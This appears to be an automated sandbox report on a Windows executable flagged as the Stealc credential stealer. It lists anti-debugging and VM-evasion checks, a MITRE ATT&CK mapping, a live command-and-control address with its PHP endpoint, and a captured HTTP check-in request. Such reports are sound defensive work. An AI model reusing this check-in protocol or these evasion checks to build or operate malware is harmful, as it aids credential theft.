              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0050DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy, 0_2_0050DD30
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose, 0_2_004F16A0
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA, 0_2_004F16B9
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00511BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess, 0_2_00511BF0
              Source: file.exe, file.exe, 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.1501268976.0000000001096000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.1501268976.000000000101E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.1501268976.0000000001064000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWh
              Source: file.exe, 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-25701
              Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-25546
              Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-25694
              Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-25566
              Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-25590
              Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
              Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
              Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
              Source: C:\Users\user\Desktop\file.exe | File opened: SICE
              Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
              Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
              Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
              Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F4A60 VirtualProtect 00000000,00000004,00000100,? 0_2_004F4A60
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00516390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00516390
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00516390 mov eax, dword ptr fs:[00000030h] 0_2_00516390
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00512A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00512A40
              Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Yara match | File source: Process Memory Space: file.exe PID: 2508, type: MEMORYSTR
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00514610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle, 0_2_00514610
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005146A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle, 0_2_005146A0
              Source: file.exe, file.exe, 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: )Program Manager
              Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00512D60
              Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00512B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, 0_2_00512B60
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00512A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00512A40
              Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00512C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_00512C10

              Stealing of Sensitive Information

              barindex
              Source: Yara match | File source: 00000000.00000002.1501268976.000000000101E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.1442560518.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: file.exe PID: 2508, type: MEMORYSTR
              Source: Yara match | File source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Source: Yara match | File source: 00000000.00000002.1501268976.000000000101E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match | File source: 00000000.00000003.1442560518.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: file.exe PID: 2508, type: MEMORYSTR
              Source: Yara match | File source: dump.pcap, type: PCAP

              MITRE ATT&CK Matrix

              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 Create Account | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | 12 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
              Source | Detection | Scanner | Label
              file.exe | 100% | Avira | TR/Crypt.TPM.Gen
              file.exe | 100% | Joe Sandbox ML |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label
              http://185.215.113.206/c4becf79229cb002.php6E | 100% | Avira URL Cloud | malware
              http://185.215.113.206/c4becf79229cb002.phpBE | 100% | Avira URL Cloud | malware
              http://185.215.113.206/c4becf79229cb002.php/Q | 100% | Avira URL Cloud | malware
              http://185.215.113.206/c4becf79229cb002.phpfE | 100% | Avira URL Cloud | malware
              http://185.215.113.206/V | 100% | Avira URL Cloud | malware
              No contacted domains info
                      Name | Malicious | Antivirus Detection | Reputation
                      http://185.215.113.206/c4becf79229cb002.php | false | | high
                      http://185.215.113.206/ | false | | high
                      Name | Source | Malicious | Antivirus Detection | Reputation
                      http://185.215.113.206 | file.exe, 00000000.00000002.1501268976.000000000101E000.00000004.00000020.00020000.00000000.sdmp | false | | high
                      http://185.215.113.206/c4becf79229cb002.php/Q | file.exe, 00000000.00000002.1501268976.0000000001079000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                      http://185.215.113.206/c4becf79229cb002.php6E | file.exe, 00000000.00000002.1501268976.0000000001064000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                      http://185.215.113.206/c4becf79229cb002.phpfE | file.exe, 00000000.00000002.1501268976.0000000001064000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                      http://185.215.113.206/V | file.exe, 00000000.00000002.1501268976.0000000001079000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                      http://185.215.113.206/f | file.exe, 00000000.00000002.1501268976.0000000001079000.00000004.00000020.00020000.00000000.sdmp | false | | high
                      http://185.215.113.206/c4becf79229cb002.phpBE | file.exe, 00000000.00000002.1501268976.0000000001064000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                      IP | Domain | Country | ASN | ASN Name | Malicious
                      185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                      Joe Sandbox version: 41.0.0 Charoite
                      Analysis ID: 1561397
                      Start date and time: 2024-11-23 10:32:12 +01:00
                      Joe Sandbox product: CloudBasic
                      Overall analysis duration: 0h 3m 49s
                      Hypervisor based Inspection enabled: false
                      Report type: full
                      Cookbook file name: default.jbs
                      Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of new started processes analysed: 6
                      Number of new started drivers analysed: 0
                      Number of existing processes analysed: 0
                      Number of existing drivers analysed: 0
                      Number of injected processes analysed: 0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode: default
                      Analysis stop reason: Timeout
                      Sample name: file.exe
                      Detection: MAL
                      Classification: mal100.troj.evad.winEXE@1/0@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 79%
                      • Number of executed functions: 18
                      • Number of non-executed functions: 122
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Stop behavior analysis, all processes terminated
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes were analyzed; the report is missing behavior information
                      • Report size getting too big, too many NtQueryValueKey calls found
                      • VT rate limit hit for: file.exe
                      No simulations
                      Match: 185.215.113.206
                      Associated Sample Name / URL | Detection | Threat Name | Context
                      file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
                      file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
                      file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
                      file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
                      file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
                      file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
                      file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc | 185.215.113.206/c4becf79229cb002.php
                      file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206/c4becf79229cb002.php
                      file.exe | malicious | Stealc | 185.215.113.206/c4becf79229cb002.php
                      file.exe | malicious | PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar | 185.215.113.206/
                      No context
                      Match: WHOLESALECONNECTIONSNL
                      Associated Sample Name / URL | Detection | Threat Name | Context
                      file.exe | malicious | Amadey, Cryptbot | 185.215.113.43
                      file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
                      file.exe | malicious | LummaC Stealer | 185.215.113.16
                      file.exe | malicious | LummaC Stealer | 185.215.113.16
                      file.exe | malicious | Stealc | 185.215.113.206
                      file.exe | malicious | Amadey, Cryptbot | 185.215.113.43
                      file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.206
                      file.exe | malicious | LummaC Stealer | 185.215.113.16
                      file.exe | malicious | Stealc | 185.215.113.206
                      file.exe | malicious | Amadey, Cryptbot | 185.215.113.43
                      No context
                      No context
                      No created / dropped files found
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.943118479213282
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:1'832'448 bytes
                      MD5:69cbce48a9ce8b1da7a0195ae4dfbccc
                      SHA1:c05a7472201be886b55e2958351df9e211fbe639
                      SHA256:65e88eb9ca629cda57680a4f4f7d0d39fe7dfe7ef80d619b809779e9ecff33ad
                      SHA512:f24c8b12f0d2fd02a4ffcc7d196f96f2c1f8edbe029c5e99133795d8834589b2ad60d27f55fcb3d5887fc818b8bc178298f53dbf43a5cc879aef279e809fa311
                      SSDEEP:49152:xU9+qhQuGyU+eN3agyYmYhIHWpBsfgvGY85PMMvV:xU9HU+EbyJYWHiB3GYkUw
                      TLSH:078533A22E7A3091E27E12B4DE031E9630FE85046E9E5DDA8DD717B1CCB31D23A5D4B4
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                      Icon Hash:00928e8e8686b000
                      Entrypoint:0xaa0000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                      Instruction
                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 build 30319
                      Name | Virtual Address | Virtual Size | Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24b04d | 0x61 | .idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x24a000 | 0x2b0 | .rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24b1f8 | 0x8 | .idata
                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                       | 0x1000 | 0x249000 | 0x16200 | 6049851021f57c341457c921aa13e977 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc | 0x24a000 | 0x2b0 | 0x200 | c44f8c84def4bd609cee9c3e8c48cd27 | False | 0.794921875 | data | 6.073671984354682 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata | 0x24b000 | 0x1000 | 0x200 | 0d0399d83a742d5d86c5718841e8e842 | False | 0.134765625 | data | 0.8646718654202081 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                       | 0x24c000 | 0x2ad000 | 0x200 | e419e0d48a99ff88648109b18f77a1ae | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      kuxshahz | 0x4f9000 | 0x1a6000 | 0x1a5600 | 2ca4f70806780951d344b2e5c7ef1143 | False | 0.9946806168421833 | data | 7.953437289749726 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      horlowmv | 0x69f000 | 0x1000 | 0x600 | 13bd256a0ae2d1afecadf8c4f18a6667 | False | 0.6223958333333334 | data | 5.361304263343795 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .taggant | 0x6a0000 | 0x3000 | 0x2200 | 505eac359398b8ec9192709380cf03bc | False | 0.053423713235294115 | DOS executable (COM) | 0.8195799666556177 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                      RT_MANIFEST | 0x69e1d0 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
                      DLL | Import
                      kernel32.dll | lstrcpy
                      Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                      2024-11-23T10:33:19.457814+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.8 | 49704 | 185.215.113.206 | 80 | TCP
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Nov 23, 2024 10:33:17.459475994 CET | 49704 | 80 | 192.168.2.8 | 185.215.113.206
                      Nov 23, 2024 10:33:17.579591990 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.8
                      Nov 23, 2024 10:33:17.579673052 CET | 49704 | 80 | 192.168.2.8 | 185.215.113.206
                      Nov 23, 2024 10:33:17.580102921 CET | 49704 | 80 | 192.168.2.8 | 185.215.113.206
                      Nov 23, 2024 10:33:17.700726986 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.8
                      Nov 23, 2024 10:33:18.927041054 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.8
                      Nov 23, 2024 10:33:18.927155018 CET | 49704 | 80 | 192.168.2.8 | 185.215.113.206
                      Nov 23, 2024 10:33:18.930485964 CET | 49704 | 80 | 192.168.2.8 | 185.215.113.206
                      Nov 23, 2024 10:33:19.052683115 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.8
                      Nov 23, 2024 10:33:19.457628012 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.8
                      Nov 23, 2024 10:33:19.457813978 CET | 49704 | 80 | 192.168.2.8 | 185.215.113.206
                      Nov 23, 2024 10:33:22.769968033 CET | 49704 | 80 | 192.168.2.8 | 185.215.113.206
                      • 185.215.113.206
                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      0 | 192.168.2.8 | 49704 | 185.215.113.206 | 80 | 2508 | C:\Users\user\Desktop\file.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Nov 23, 2024 10:33:17.580102921 CET | 90 | OUT | GET / HTTP/1.1
                      Host: 185.215.113.206
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Nov 23, 2024 10:33:18.927041054 CET | 203 | IN | HTTP/1.1 200 OK
                      Date: Sat, 23 Nov 2024 09:33:18 GMT
                      Server: Apache/2.4.41 (Ubuntu)
                      Content-Length: 0
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Nov 23, 2024 10:33:18.930485964 CET | 413 | OUT | POST /c4becf79229cb002.php HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----AKFHCAKJDBKKEBFIIJJE
                      Host: 185.215.113.206
                      Content-Length: 211
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 42 33 30 46 46 38 44 34 43 42 45 32 30 39 39 39 32 35 32 38 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 48 43 41 4b 4a 44 42 4b 4b 45 42 46 49 49 4a 4a 45 2d 2d 0d 0a
                      Data Ascii (CRLF line breaks restored from the raw bytes):
                      ------AKFHCAKJDBKKEBFIIJJE
                      Content-Disposition: form-data; name="hwid"

                      9B30FF8D4CBE2099925286
                      ------AKFHCAKJDBKKEBFIIJJE
                      Content-Disposition: form-data; name="build"

                      mars
                      ------AKFHCAKJDBKKEBFIIJJE--
                      Nov 23, 2024 10:33:19.457628012 CET | 210 | IN | HTTP/1.1 200 OK
                      Date: Sat, 23 Nov 2024 09:33:19 GMT
                      Server: Apache/2.4.41 (Ubuntu)
                      Content-Length: 8
                      Keep-Alive: timeout=5, max=99
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 59 6d 78 76 59 32 73 3d
                      Data Ascii: YmxvY2s=
                      Target ID:0
                      Start time:04:33:13
                      Start date:23/11/2024
                      Path:C:\Users\user\Desktop\file.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\file.exe"
                      Imagebase:0x4f0000
                      File size:1'832'448 bytes
                      MD5 hash:69CBCE48A9CE8B1DA7A0195AE4DFBCCC
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1501268976.000000000101E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1442560518.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true
                        Execution Graph

                        Execution Coverage:5%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:16.3%
                        Total number of Nodes:1408
                        Total number of Limit Nodes:28
